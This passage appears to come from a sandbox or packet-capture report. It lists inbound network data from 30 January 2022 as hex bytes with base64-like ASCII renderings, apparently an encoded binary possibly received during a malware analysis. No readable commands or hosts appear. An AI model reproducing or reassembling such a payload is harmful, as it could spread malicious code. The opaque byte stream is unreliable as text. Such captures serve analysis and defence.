39 50 2f 77 41 49 4f 6c 0d 0a 51 61 61 4d 76 6d 68 59 56 36 55 7a 77 66 38 42 64 4b 6d 46 32 33 36 74 4d 38 6b 38 39 6f 76 48 6d 76 Data Ascii: ovQ+Fafz//4GN1Pbw/4XJGR34feU28EhHx/8PhYgAAAozwFCGhdT0kqf6xETMqLHax9j0//9QjY8w/v/waMwBbVgjqXcqV07UhhCLnSz+//WJnej5//+Ftlf2rWgyV32eqwUBAAAzwFqJhdT7//+J6HSNvpe/0pajvf9QjYUw/vX/aMwOAABQhYJkQWixk15lgulF////g6/U9P/wAIOlQaaMvmhYV6Uzwf8BdKmF236tM8k89ovHmv
2022-01-30 12:33:36 UTC	1239	IN	Data Raw: 77 67 2f 6a 2f 0d 0a 47 56 34 31 65 68 30 69 4b 35 49 49 47 56 35 64 77 34 76 2f 56 59 48 73 56 6a 50 35 4f 58 55 51 45 30 51 6b 79 68 55 6d 33 41 4e 66 46 66 39 31 44 4f 68 38 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 46 74 43 52 4f 55 79 66 39 56 69 2b 78 57 4d 2f 77 35 64 52 42 78 49 56 4e 6d 59 75 59 75 54 54 2b 35 4b 6c 72 63 44 77 68 58 55 2b 69 4f 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 4e 74 44 42 41 4b 67 59 76 2f 56 59 76 73 55 54 6e 41 69 55 33 7a 69 51 47 4a 4c 46 7a 36 41 47 43 37 46 6b 4c 65 41 78 43 4a 51 52 53 4a 51 52 4b 4a 51 52 79 47 51 53 43 4a 0d 0a 4c 48 7a 36 41 45 42 55 33 67 39 6e 79 30 45 34 69 45 45 38 69 59 74 41 42 41 41 50 69 59 46 45 61 56 68 7a 79 71 6e 37 6c 4d 57 6f 46 34 76 73 55 54 Data Ascii: wg/j/GV41eh0iK5IIGV5dw4v/VYHsVjP5OXUQE0QkyhUm3ANfFf91DOh8IAoAgz/wdAZGVi1jPYFtCROUyf9Vi+xWM/w5dRBxIVNmYuYuTT+5KlrcDwhXU+iOIAoAgz/wdAZGVi1jPYNtDBAKgYv/VYvsUTnAiU3ziQGJLFz6AGC7FkLeAxCJQRSJQRKJQRyGQSCJLHz6AEBU3g9ny0E4iEE8iYtABAAPiYFEaVhzyqn7lMWoF4vsUT
2022-01-30 12:33:36 UTC	1255	IN	Data Raw: 44 74 62 76 58 55 49 36 41 54 2b 2f 2f 58 4d 69 2f 39 61 69 2b 79 4e 4b 45 67 6a 4b 32 6a 4e 49 6b 4b 6f 4e 77 6a 6f 54 76 2f 2f 2f 34 6e 45 45 46 33 4d 69 2f 39 56 0d 0a 35 72 54 2b 42 48 78 69 50 55 36 6f 4e 78 44 2f 64 51 7a 2f 64 51 4c 6f 56 66 2f 77 2f 34 50 45 65 51 57 77 79 70 64 6b 41 50 48 66 38 77 63 51 4d 2f 5a 71 41 47 4b 67 44 77 41 50 56 2b 6a 4b 0d 0a 43 56 68 7a 78 4b 68 47 54 37 46 53 6d 72 49 48 45 49 50 47 47 49 6e 48 47 49 48 78 55 41 45 41 62 53 71 6f 38 57 6e 5a 58 53 52 58 71 68 30 41 41 41 42 5a 4d 73 70 66 58 73 4f 45 2f 31 57 4c 0d 0a 67 54 4d 32 53 58 41 33 33 2f 39 51 55 6c 44 2f 46 52 42 67 42 68 70 64 77 34 76 77 56 6f 73 31 74 65 70 30 55 65 33 45 49 32 34 38 68 42 68 58 6a 62 68 77 73 51 30 51 56 2f 38 61 48 47 41 47 0d 0a Data Ascii: DtbvXUI6AT+//XMi/9ai+yNKEgjK2jNIkKoNwjoTv///4nEEF3Mi/9V5rT+BHxiPU6oNxD/dQz/dQLoVf/w/4PEeQWwypdkAPHf8wcQM/ZqAGKgDwAPV+jKCVhzxKhGT7FSmrIHEIPGGInHGIHxUAEAbSqo8WnZXSRXqh0AAABZMspfXsOE/1WLgTM2SXA33/9QUlD/FRBgBhpdw4vwVos1tep0Ue3EI248hBhXjbhwsQ0QV/8aHGAG
2022-01-30 12:33:36 UTC	1271	IN	Data Raw: 51 34 41 74 38 65 70 6e 53 64 7a 51 52 31 49 33 41 4e 62 79 56 55 49 39 38 48 2f 2f 77 55 41 64 51 53 4b 30 6e 52 6f 0d 0a 73 34 48 4e 51 70 54 4e 71 4a 47 33 45 54 50 62 39 73 52 42 64 51 74 44 39 6b 55 42 45 48 55 66 62 70 48 36 44 47 53 33 68 54 64 52 77 63 6b 42 69 55 30 4d 41 39 68 4f 39 6b 55 42 45 48 54 6f 0d 0a 43 39 4d 4f 54 2b 46 6e 58 2f 61 34 76 51 41 41 5a 69 50 34 68 64 45 50 74 38 64 70 69 58 30 4f 4e 69 78 36 54 47 69 79 56 30 34 78 79 30 55 4f 33 55 55 49 61 67 70 52 55 64 30 54 4a 4f 67 78 0d 0a 62 56 68 7a 77 71 77 2b 76 47 30 39 51 6c 48 64 32 46 48 64 48 43 37 6f 48 67 41 50 41 41 2b 33 6d 74 75 33 54 61 6e 63 55 38 2b 78 76 51 63 41 41 49 48 75 2f 67 6b 41 41 46 2b 45 52 52 43 4a 0d 0a 58 51 59 75 67 75 50 4e 41 73 57 37 45 31 47 4c Data Ascii: Q4At8epnSdzQR1I3ANbyVUI98H//wUAdQSK0nRos4HNQpTNqJG3ETPb9sRBdQtD9kUBEHUfbpH6DGS3hTdRwckBiU0MA9hO9kUBEHToC9MOT+FnX/a4vQAAZiP4hdEPt8dpiX0ONix6TGiyV04xy0UO3UUIagpRUd0TJOgxbVhzwqw+vG09QlHd2FHdHC7oHgAPAA+3mtu3TancU8+xvQcAAIHu/gkAAF+ERRCJXQYuguPNAsW7E1GL
2022-01-30 12:33:36 UTC	1287	IN	Data Raw: 44 70 62 77 58 34 59 2f 6e 51 47 67 45 51 6f 67 4f 74 32 69 38 66 47 0d 0a 4b 33 44 79 77 6f 41 79 49 31 37 55 71 67 46 30 42 34 50 6f 41 57 44 30 36 77 5a 6c 39 65 73 43 42 36 34 72 45 5a 63 6e 39 79 35 52 55 6f 76 59 67 2f 76 2f 64 41 65 46 32 33 51 47 55 2f 38 56 0d 0a 79 54 68 31 55 59 4d 77 5a 49 37 53 67 6e 51 63 44 37 62 41 69 56 51 59 67 2f 67 4e 64 51 61 41 49 33 41 7a 71 6b 47 78 72 30 30 69 5a 6f 42 4f 4b 41 6a 72 48 6f 70 4f 4b 45 44 49 52 68 6a 2b 0d 0a 6b 71 65 4d 34 46 79 47 55 46 37 53 67 6e 51 4b 69 77 53 34 78 30 6f 51 2f 76 2f 77 2f 30 65 44 6b 6c 74 38 78 44 2f 4e 71 4c 45 49 48 46 76 44 61 67 78 6f 2b 48 51 48 45 4f 67 50 37 66 37 2f 0d 0a 42 31 2b 62 68 4d 72 4e 71 42 64 6b 6d 59 68 64 35 34 6c 64 2f 46 6e 6f 4f 4a 51 50 41 46 6d 46 Data Ascii: DpbwX4Y/nQGgEQogOt2i8fGK3DywoAyI17UqgF0B4PoAWD06wZl9esCB64rEZcn9y5RUovYg/v/dAeF23QGU/8VyTh1UYMwZI7SgnQcD7bAiVQYg/gNdQaAI3AzqkGxr00iZoBOKAjrHopOKEDIRhj+kqeM4FyGUF7SgnQKiwS4x0oQ/v/w/0eDklt8xD/NqLEIHFvDagxo+HQHEOgP7f7/B1+bhMrNqBdkmYhd54ld/FnoOJQPAFmF
2022-01-30 12:33:36 UTC	1303	IN	Data Raw: 51 63 66 5a 67 38 6f 0d 0a 57 4f 69 2f 52 33 68 55 57 42 65 59 4a 41 39 59 30 57 59 50 63 4d 44 75 38 67 39 57 31 2f 49 50 4e 59 6d 42 54 6a 44 6d 4d 55 46 46 5a 39 44 4d 42 68 42 6d 44 32 54 4b 67 65 71 50 2f 77 45 41 0d 0a 6d 6f 4b 79 75 32 2b 78 6c 55 7a 63 67 49 50 67 49 41 50 51 5a 67 56 58 2f 37 69 50 50 77 41 41 43 31 65 33 75 57 76 41 57 42 63 44 5a 68 54 79 44 31 6e 48 5a 67 56 7a 38 53 31 70 44 33 44 4a 0d 0a 4b 54 35 38 61 56 58 79 6d 30 68 48 73 41 39 59 36 6d 59 50 57 64 50 79 44 31 6a 4b 5a 67 38 55 72 54 35 38 47 4a 6a 41 57 42 65 33 4a 41 39 5a 77 47 59 50 57 50 52 6d 44 31 6e 33 38 67 39 5a 0d 0a 72 6a 35 38 4d 5a 2f 63 70 55 45 4f 68 57 59 50 63 4f 76 75 38 67 56 5a 38 2f 49 41 57 65 4e 6d 59 6a 61 4b 4a 32 64 42 6f 47 4d 78 54 57 37 53 Data Ascii: QcfZg8oWOi/R3hUWBeYJA9Y0WYPcMDu8g9W1/IPNYmBTjDmMUFFZ9DMBhBmD2TKgeqP/wEAmoKyu2+xlUzcgIPgIAPQZgVX/7iPPwAAC1e3uWvAWBcDZhTyD1nHZgVz8S1pD3DJKT58aVXym0hHsA9Y6mYPWdPyD1jKZg8UrT58GJjAWBe3JA9ZwGYPWPRmD1n38g9Zrj58MZ/cpUEOhWYPcOvu8gVZ8/IAWeNmYjaKJ2dBoGMxTW7S
2022-01-30 12:33:36 UTC	1319	IN	Data Raw: 2b 56 30 35 58 77 53 63 41 6a 55 58 73 69 37 53 77 41 41 41 50 61 67 35 58 42 31 6b 6a 71 63 50 77 71 4c 48 61 43 51 53 4c 38 46 46 71 44 31 32 4e 52 65 78 6c 41 56 44 6f 0d 0a 2b 70 71 4d 76 6d 50 43 32 67 31 66 45 6d 6f 51 56 34 31 46 37 47 41 42 55 4f 69 4d 77 76 2f 2f 5a 71 6a 2b 41 6c 68 69 50 55 41 41 7a 30 58 73 61 67 4a 51 36 47 58 43 2f 2f 2b 4d 78 46 41 4c 0d 0a 6e 64 55 77 64 54 68 59 57 42 6e 61 42 2b 78 71 41 6c 44 6f 57 4d 6a 2f 2f 34 50 4c 46 41 76 47 47 58 49 67 71 51 72 4d 71 4c 45 45 71 70 70 32 2f 2f 2f 2f 64 66 4c 6f 6b 6e 62 77 2f 34 50 45 0d 0a 59 64 73 2b 74 5a 65 35 47 72 49 47 71 6f 4a 32 2f 2f 2b 4c 52 66 35 5a 36 33 43 45 55 77 6a 72 5a 74 55 37 6b 65 6a 4c 58 6a 6b 2f 79 67 70 43 69 67 4b 45 77 48 2f 76 69 33 33 33 69 33 55 49 Data Ascii: +V05XwScAjUXsi7SwAAAPag5XB1kjqcPwqLHaCQSL8FFqD12NRexlAVDo+pqMvmPC2g1fEmoQV41F7GABUOiMwv//Zqj+AlhiPUAAz0XsagJQ6GXC//+MxFALndUwdThYWBnaB+xqAlDoWMj//4PLFAvGGXIgqQrMqLEEqpp2////dfLoknbw/4PEYds+tZe5GrIGqoJ2//+LRf5Z63CEUwjrZtU7kejLXjk/ygpCigKEwH/vi333i3UI
2022-01-30 12:33:36 UTC	1335	IN	Data Raw: 46 79 58 52 31 67 36 57 30 6c 61 65 4d 51 56 76 4e 33 4d 72 71 63 76 37 2f 2f 32 6f 4b 57 76 33 69 41 34 57 37 2b 50 2f 2f 0d 0a 35 4e 7a 4f 63 5a 62 4e 71 4d 32 46 51 6b 65 4a 6c 62 54 34 2f 2f 55 37 2b 58 58 57 69 37 32 34 6c 61 65 4d 78 4c 70 47 46 38 58 53 62 76 37 2f 2f 34 50 34 63 33 6b 50 69 5a 53 4b 4d 50 37 2f 0d 0a 6b 71 66 32 62 5a 62 4e 71 4b 56 78 63 63 42 51 69 59 57 63 39 76 58 2f 69 59 55 6a 2f 76 2f 2f 34 4e 33 54 74 35 66 4e 42 38 50 53 63 76 37 2f 2f 31 5a 51 36 42 48 53 2f 76 2b 4d 78 42 43 4e 0d 0a 36 41 53 50 76 70 64 69 32 73 74 37 76 50 2f 2f 55 4f 68 75 7a 50 54 2f 57 56 6d 45 6a 5a 7a 34 6b 71 63 5a 53 7a 49 4a 6c 55 48 53 42 41 45 41 41 49 75 46 58 50 62 2f 2f 34 31 32 41 66 2b 46 0d 0a 2b 61 43 4d 76 71 34 7a 5a 73 66 71 2b 76 Data Ascii: FyXR1g6W0laeMQVvN3Mrqcv7//2oKWv3iA4W7+P//5NzOcZbNqM2FQkeJlbT4//U7+XXWi724laeMxLpGF8XSbv7//4P4c3kPiZSKMP7/kqf2bZbNqKVxccBQiYWc9vX/iYUj/v//4N3Tt5fNB8PScv7//1ZQ6BHS/v+MxBCN6ASPvpdi2st7vP//UOhuzPT/WVmEjZz4kqcZSzIJlUHSBAEAAIuFXPb//412Af+F+aCMvq4zZsfq+v
2022-01-30 12:33:36 UTC	1351	IN	Data Raw: 79 2f 33 45 6a 61 77 2b 33 30 43 50 57 77 65 67 45 71 41 52 37 41 34 50 4b 0d 0a 5a 66 42 37 4e 57 75 78 6e 55 72 2f 55 6e 51 44 67 38 6f 43 71 43 70 30 41 67 76 5a 71 41 4a 30 62 31 4f 6b 54 73 5a 76 72 38 55 53 75 6f 50 67 77 49 6c 46 39 41 57 75 56 66 53 45 52 66 69 6f 0d 0a 55 69 78 62 79 71 41 52 6d 59 2b 32 52 71 67 45 64 41 4f 44 79 51 4b 6f 43 48 51 4d 67 38 6b 45 78 55 67 48 51 75 76 37 56 65 5a 33 4e 67 49 4c 7a 71 67 43 64 41 67 4c 7a 77 76 46 69 38 46 66 0d 0a 68 6d 51 56 79 69 58 4f 5a 49 36 68 67 7a 39 30 4d 51 2b 33 77 53 6e 47 77 65 41 4c 39 73 45 45 47 56 76 77 69 57 44 45 6c 6b 59 6a 51 59 50 49 42 50 62 42 45 48 34 44 67 38 67 4e 39 73 45 67 0d 0a 47 56 70 34 68 35 37 7a 56 54 70 53 54 77 41 41 43 41 42 65 79 63 6d 4c 2f 31 57 45 37 49 Data Ascii: y/3Ejaw+30CPWwegEqAR7A4PKZfB7NWuxnUr/UnQDg8oCqCp0AgvZqAJ0b1OkTsZvr8USuoPgwIlF9AWuVfSERfioUixbyqARmY+2RqgEdAODyQKoCHQMg8kExUgHQuv7VeZ3NgILzqgCdAgLzwvFi8FfhmQVyiXOZI6hgz90MQ+3wSnGweAL9sEEGVvwiWDElkYjQYPIBPbBEH4Dg8gN9sEgGVp4h57zVTpSTwAACABeycmL/1WE7I
2022-01-30 12:33:36 UTC	1367	IN	Data Raw: 4c 54 62 7a 6d 76 30 2f 37 0d 0a 6b 74 50 2b 6f 5a 62 4e 71 4b 65 54 46 76 76 2f 69 30 32 34 36 61 5a 50 2b 2f 2b 43 6a 52 54 2f 6b 71 65 61 38 44 7a 4a 71 4d 58 61 68 76 37 2f 2f 2b 6d 6d 56 50 48 2f 69 30 32 37 36 59 35 50 0d 0a 6c 71 66 34 7a 4e 54 4d 71 4c 47 2b 30 56 54 37 2f 34 32 4e 48 50 54 2f 2f 2b 6d 48 56 50 76 2f 35 74 58 62 76 35 66 4e 76 6a 4d 44 75 66 2b 4c 6a 61 44 2b 2f 2f 58 70 63 6c 54 30 2f 34 32 4e 0d 0a 61 61 61 4d 76 6f 46 56 41 37 57 6f 79 59 32 51 2f 76 2f 2f 36 56 5a 55 2b 2f 2b 45 6a 59 6a 2b 6b 71 65 61 45 44 7a 4a 71 4d 50 61 72 76 33 2f 2f 2b 6c 47 56 50 48 2f 69 34 31 33 2f 76 2f 2f 0d 0a 68 47 4d 6e 75 70 65 35 32 69 61 70 76 66 2f 70 4d 46 54 37 2f 34 47 4e 57 50 37 77 2f 2b 6b 6c 4f 61 4f 4d 79 75 56 36 71 62 47 6f 71 78 Data Ascii: LTbzmv0/7ktP+oZbNqKeTFvv/i0246aZP+/+CjRT/kqea8DzJqMXahv7//+mmVPH/i0276Y5Plqf4zNTMqLG+0VT7/42NHPT//+mHVPv/5tXbv5fNvjMDuf+LjaD+//XpclT0/42NaaaMvoFVA7WoyY2Q/v//6VZU+/+EjYj+kqeaEDzJqMParv3//+lGVPH/i413/v//hGMnupe52iapvf/pMFT7/4GNWP7w/+klOaOMyuV6qbGoqx
2022-01-30 12:33:36 UTC	1383	IN	Data Raw: 4f 4e 6e 71 78 7a 63 42 2f 68 51 36 48 2f 50 2f 66 58 47 67 45 53 6c 42 78 41 41 68 70 37 34 70 44 58 78 6d 34 49 43 79 65 79 44 37 41 67 50 56 38 70 6d 44 78 4e 4b 2b 4f 73 53 0d 0a 35 68 32 4c 77 71 67 7a 33 41 4f 72 77 64 45 41 69 55 58 34 69 55 66 38 67 33 33 7a 41 48 63 69 48 31 37 77 50 4a 41 76 4a 46 51 39 51 6d 6f 42 69 31 58 38 55 6f 46 46 2b 46 44 6e 4c 38 2f 39 0d 0a 6b 70 37 7a 6c 63 67 31 52 30 36 38 68 49 76 6c 58 63 50 4d 7a 46 2b 4c 37 49 50 6a 43 41 39 58 72 54 35 38 55 69 33 4b 76 46 7a 63 42 2f 69 44 77 41 47 4c 54 66 61 44 30 51 43 47 52 66 69 4a 0d 0a 49 4b 54 77 50 4a 51 79 49 47 77 6c 52 49 4e 39 2b 41 52 7a 47 6d 41 41 61 67 47 45 56 66 78 53 35 68 32 4c 45 59 44 74 6d 62 4f 6f 68 49 42 77 6f 67 63 51 41 4f 48 47 69 2b 56 53 77 38 Data Ascii: ONnqxzcB/hQ6H/P/fXGgESlBxAAhp74pDXxm4ICyeyD7AgPV8pmDxNK+OsS5h2Lwqgz3AOrwdEAiUX4iUf8g33zAHciH17wPJAvJFQ9QmoBi1X8UoFF+FDnL8/9kp7zlcg1R068hIvlXcPMzF+L7IPjCA9XrT58Ui3KvFzcB/iDwAGLTfaD0QCGRfiJIKTwPJQyIGwlRIN9+ARzGmAAagGEVfxS5h2LEYDtmbOohIBwogcQAOHGi+VSw8
2022-01-30 12:33:36 UTC	1399	IN	Data Raw: 50 38 44 41 41 41 4b 41 41 41 41 66 56 68 7a 51 57 55 79 56 30 35 67 51 67 41 41 45 77 41 41 41 47 34 4a 41 41 41 66 41 41 41 41 0d 0a 2f 46 68 7a 51 55 45 79 56 30 35 63 51 77 41 41 46 67 41 41 41 48 6f 41 41 41 41 54 41 41 41 41 50 56 68 7a 51 58 6b 79 56 30 35 56 51 67 41 41 41 67 41 41 41 43 30 41 41 41 41 54 41 41 41 41 0d 0a 59 56 68 7a 51 57 55 79 56 30 35 59 51 67 41 41 45 77 41 41 41 41 73 41 41 41 41 6e 41 41 41 41 61 31 68 7a 51 58 34 79 56 30 34 73 51 67 41 41 41 67 41 41 41 46 30 41 41 41 41 5a 41 41 41 41 0d 0a 54 46 68 7a 51 55 38 79 56 30 36 44 51 67 41 41 4a 77 41 41 41 49 6b 41 41 41 41 5a 41 41 41 41 69 31 74 7a 51 57 55 79 56 30 35 66 51 67 41 41 44 41 41 41 41 42 38 41 41 41 41 45 41 41 41 41 0d 0a 66 46 68 7a 51 58 6f 79 56 30 35 6c Data Ascii: P8DAAAKAAAAfVhzQWUyV05gQgAAEwAAAG4JAAAfAAAA/FhzQUEyV05cQwAAFgAAAHoAAAATAAAAPVhzQXkyV05VQgAAAgAAAC0AAAATAAAAYVhzQWUyV05YQgAAEwAAAAsAAAAnAAAAa1hzQX4yV04sQgAAAgAAAF0AAAAZAAAATFhzQU8yV06DQgAAJwAAAIkAAAAZAAAAi1tzQWUyV05fQgAADAAAAB8AAAAEAAAAfFhzQXoyV05l
2022-01-30 12:33:36 UTC	1415	IN	Data Raw: 55 67 79 4c 6b 34 34 51 6e 55 41 63 67 41 67 41 48 6f 41 63 67 42 67 41 47 63 41 0d 0a 48 31 67 53 51 51 55 79 64 30 34 30 51 6d 45 41 62 67 41 67 41 47 6b 41 59 51 42 36 41 48 4d 41 43 46 68 54 51 51 6b 79 4f 55 35 33 51 6d 45 41 63 77 42 7a 41 47 38 41 63 67 42 37 41 47 6b 41 0d 0a 41 6c 67 64 51 57 49 79 4d 55 34 32 51 6d 6b 41 62 41 42 31 41 48 67 41 5a 51 41 6a 41 43 41 41 48 6c 67 57 51 51 30 79 64 30 34 6a 51 6d 67 41 5a 51 41 67 41 46 77 41 61 51 42 38 41 48 55 41 0d 0a 44 46 67 66 51 55 67 79 46 45 35 38 51 69 73 41 49 41 42 6b 41 47 55 41 59 77 42 36 41 47 30 41 43 46 67 64 51 52 77 79 4e 6b 34 6a 51 6d 6b 41 62 77 42 75 41 43 6f 41 62 77 42 68 41 43 41 41 0d 0a 44 46 67 41 51 52 73 79 4d 6b 34 6c 51 6e 51 41 63 77 41 41 41 43 49 41 55 41 42 39 Data Ascii: UgyLk44QnUAcgAgAHoAcgBgAGcAH1gSQQUyd040QmEAbgAgAGkAYQB6AHMACFhTQQkyOU53QmEAcwBzAG8AcgB7AGkAAlgdQWIyMU42QmkAbAB1AHgAZQAjACAAHlgWQQ0yd04jQmgAZQAgAFwAaQB8AHUADFgfQUgyFE58QisAIABkAGUAYwB6AG0ACFgdQRwyNk4jQmkAbwBuACoAbwBhACAADFgAQRsyMk4lQnQAcwAAACIAUAB9
2022-01-30 12:33:36 UTC	1431	IN	Data Raw: 47 38 45 41 41 44 66 36 41 59 51 0d 0a 42 6c 78 7a 51 59 6a 61 55 56 34 37 52 67 41 41 38 4f 67 47 45 49 73 45 41 41 44 7a 36 41 59 51 62 46 42 7a 51 57 44 62 55 56 35 54 53 67 41 41 50 4d 34 47 45 41 30 49 41 41 41 62 36 51 59 51 0d 0a 5a 46 42 7a 51 55 6a 62 55 56 35 64 53 67 41 41 4c 4f 6b 47 45 41 59 49 41 41 41 33 36 51 59 51 66 56 42 7a 51 53 7a 62 55 56 35 45 53 67 41 41 55 4f 6b 47 45 42 34 49 41 41 42 54 36 51 59 51 0d 0a 65 31 42 7a 51 51 44 62 55 56 35 4e 53 67 41 41 64 4f 6b 47 45 42 63 49 41 41 43 44 36 51 59 51 51 56 42 7a 51 66 44 62 55 56 35 73 53 67 41 41 73 4f 6b 47 45 44 51 49 41 41 43 7a 36 51 59 51 0d 0a 4c 6c 42 7a 51 61 44 62 55 56 34 38 53 67 41 41 34 4f 6b 47 45 41 73 4d 41 41 44 2f 36 51 59 51 61 56 52 7a 51 5a 54 62 55 56 35 51 Data Ascii: G8EAADf6AYQBlxzQYjaUV47RgAA8OgGEIsEAADz6AYQbFBzQWDbUV5TSgAAPM4GEA0IAAAb6QYQZFBzQUjbUV5dSgAALOkGEAYIAAA36QYQfVBzQSzbUV5ESgAAUOkGEB4IAABT6QYQe1BzQQDbUV5NSgAAdOkGEBcIAACD6QYQQVBzQfDbUV5sSgAAsOkGEDQIAACz6QYQLlBzQaDbUV48SgAA4OkGEAsMAAD/6QYQaVRzQZTbUV5Q
2022-01-30 12:33:36 UTC	1447	IN	Data Raw: 6e 66 56 44 71 4c 6e 46 32 56 53 68 37 50 63 31 49 50 51 6f 41 49 4a 61 37 6b 58 6f 2f 31 7a 78 66 42 6e 66 7a 46 58 4e 58 51 74 54 43 4e 6b 74 37 50 39 69 64 38 75 70 4b 43 55 30 39 0d 0a 62 56 6a 6e 67 39 59 32 4b 33 45 67 2f 44 4f 49 4d 65 63 68 50 51 6f 41 74 4a 56 44 76 6e 77 2f 30 71 41 74 55 54 41 66 45 58 4e 58 51 70 67 38 34 48 64 39 50 7a 6f 63 6b 4a 34 75 68 55 38 39 0d 0a 62 56 6a 54 39 68 45 44 4b 58 45 72 59 4d 53 76 2b 31 45 38 50 51 6f 41 4a 41 63 57 36 33 34 2f 31 36 73 59 79 41 34 31 46 33 4e 58 51 6f 51 72 76 71 52 2f 50 35 59 58 75 6d 4b 4d 56 55 4d 39 0d 0a 62 56 6a 6a 30 31 77 64 31 33 46 39 7a 30 74 66 79 7a 77 71 50 51 6f 41 50 4a 72 5a 64 49 41 2f 75 46 36 2f 7a 42 41 35 48 6e 4e 58 51 67 34 79 73 64 47 41 50 33 31 5a 7a 31 59 71 Data Ascii: nfVDqLnF2VSh7Pc1IPQoAIJa7kXo/1zxfBnfzFXNXQtTCNkt7P9id8upKCU09bVjng9Y2K3Eg/DOIMechPQoAtJVDvnw/0qAtUTAfEXNXQpg84Hd9PzockJ4uhU89bVjT9hEDKXErYMSv+1E8PQoAJAcW634/16sYyA41F3NXQoQrvqR/P5YXumKMVUM9bVjj01wd13F9z0tfyzwqPQoAPJrZdIA/uF6/zBA5HnNXQg4ysdGAP31Zz1Yq
2022-01-30 12:33:36 UTC	1463	IN	Data Raw: 51 50 77 6f 41 41 41 44 76 74 4d 38 2f 62 56 68 7a 51 59 69 47 6d 48 46 58 51 67 41 41 67 47 2f 50 50 77 6f 41 41 41 43 50 62 38 38 2f 0d 0a 62 56 68 7a 51 55 67 59 6d 48 46 58 51 67 41 41 49 43 72 50 50 77 6f 41 41 41 44 50 35 4d 34 2f 62 56 68 7a 51 61 6a 57 6d 58 46 58 51 67 41 41 59 4a 2f 4f 50 77 6f 41 41 41 42 76 6e 38 34 2f 0d 0a 62 56 68 7a 51 57 68 6f 6d 58 46 58 51 67 41 41 41 46 72 4f 50 77 6f 41 41 41 43 66 47 38 34 2f 62 56 68 7a 51 66 67 70 6d 58 46 58 51 67 41 41 4d 4e 62 4e 50 77 6f 41 41 41 41 2f 31 73 30 2f 0d 0a 62 56 68 7a 51 61 69 6c 6d 6e 46 58 51 67 41 41 77 4a 66 4e 50 77 6f 41 41 41 42 66 57 63 30 2f 62 56 68 7a 51 54 68 72 6d 6e 46 58 51 67 41 41 34 42 72 4e 50 77 6f 41 41 41 44 76 47 73 30 2f 0d 0a 62 56 68 7a 51 51 6a 52 6d 33 Data Ascii: QPwoAAADvtM8/bVhzQYiGmHFXQgAAgG/PPwoAAACPb88/bVhzQUgYmHFXQgAAICrPPwoAAADP5M4/bVhzQajWmXFXQgAAYJ/OPwoAAABvn84/bVhzQWhomXFXQgAAAFrOPwoAAACfG84/bVhzQfgpmXFXQgAAMNbNPwoAAAA/1s0/bVhzQailmnFXQgAAwJfNPwoAAABfWc0/bVhzQThrmnFXQgAA4BrNPwoAAADvGs0/bVhzQQjRm3
2022-01-30 12:33:36 UTC	1479	IN	Data Raw: 31 55 58 73 79 56 30 34 4f 53 51 59 51 46 41 41 41 41 47 34 4c 42 68 41 50 41 41 41 41 0d 0a 41 6c 4e 31 55 58 34 79 56 30 34 74 53 51 59 51 46 77 41 41 41 49 38 4c 42 68 41 58 41 41 41 41 2f 56 4e 31 55 57 67 79 56 30 37 4d 53 51 59 51 47 67 41 41 41 4b 77 4c 42 68 41 55 41 41 41 41 0d 0a 33 46 4e 31 55 58 51 79 56 30 37 72 53 51 59 51 41 41 41 41 41 4d 30 4c 42 68 41 52 41 41 41 41 76 31 4e 31 55 58 63 79 56 30 36 4b 53 51 59 51 49 41 41 41 41 4f 49 4c 42 68 41 50 41 41 41 41 0d 0a 6e 6c 4e 31 55 55 6f 79 56 30 36 70 53 51 59 51 49 77 41 41 41 41 4d 4d 42 68 41 72 41 41 41 41 65 56 52 31 55 55 6f 33 78 46 64 78 51 67 41 41 41 47 30 48 45 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 51 41 41 41 50 58 2f 2f 2f Data Ascii: 1UXsyV04OSQYQFAAAAG4LBhAPAAAAAlN1UX4yV04tSQYQFwAAAI8LBhAXAAAA/VN1UWgyV07MSQYQGgAAAKwLBhAUAAAA3FN1UXQyV07rSQYQAAAAAM0LBhARAAAAv1N1UXcyV06KSQYQIAAAAOILBhAPAAAAnlN1UUoyV06pSQYQIwAAAAMMBhArAAAAeVR1UUo3xFdxQgAAAG0HEAoAAAAPAAAAbVhzQWgyV05XQgAAAQAAAPX///
2022-01-30 12:33:36 UTC	1495	IN	Data Raw: 41 41 4d 77 77 46 6a 49 2b 4d 70 59 79 0d 0a 33 47 71 31 64 4d 59 45 34 48 5a 78 66 67 41 41 41 46 41 41 41 43 6f 41 41 41 41 4a 4d 59 41 7a 75 32 74 56 64 78 34 45 6b 58 5a 42 65 32 59 37 74 6a 73 47 50 6c 77 2b 41 41 41 50 59 41 41 41 0d 0a 54 56 68 7a 51 63 34 43 6f 58 35 70 63 5a 59 7a 44 6a 5a 6d 4e 72 77 34 42 6a 6c 33 4f 39 59 37 6d 32 64 7a 51 57 68 43 56 30 35 4c 51 67 41 41 6c 6a 41 30 4d 55 77 78 51 44 52 5a 4e 78 59 34 0d 0a 75 32 41 6c 65 37 34 4a 6b 58 4e 58 77 67 41 41 48 41 41 41 41 41 77 77 52 6a 4a 5a 4e 43 59 33 7a 6d 44 51 65 31 51 4f 30 58 4e 78 66 4d 59 2b 41 4a 41 41 41 45 49 41 41 41 42 70 4d 4a 59 79 0d 0a 67 6d 75 48 63 6d 45 47 51 6e 70 4e 64 6c 67 32 58 54 62 33 4e 76 59 32 4a 6a 6d 77 4f 63 51 35 53 32 4b 79 65 36 34 49 63 58 Data Ascii: AAMwwFjI+MpYy3Gq1dMYE4HZxfgAAAFAAACoAAAAJMYAzu2tVdx4EkXZBe2Y7tjsGPlw+AAAPYAAATVhzQc4CoX5pcZYzDjZmNrw4Bjl3O9Y7m2dzQWhCV05LQgAAljA0MUwxQDRZNxY4u2Ale74JkXNXwgAAHAAAAAwwRjJZNCY3zmDQe1QO0XNxfMY+AJAAAEIAAABpMJYygmuHcmEGQnpNdlg2XTb3NvY2JjmwOcQ5S2Kye64IcX
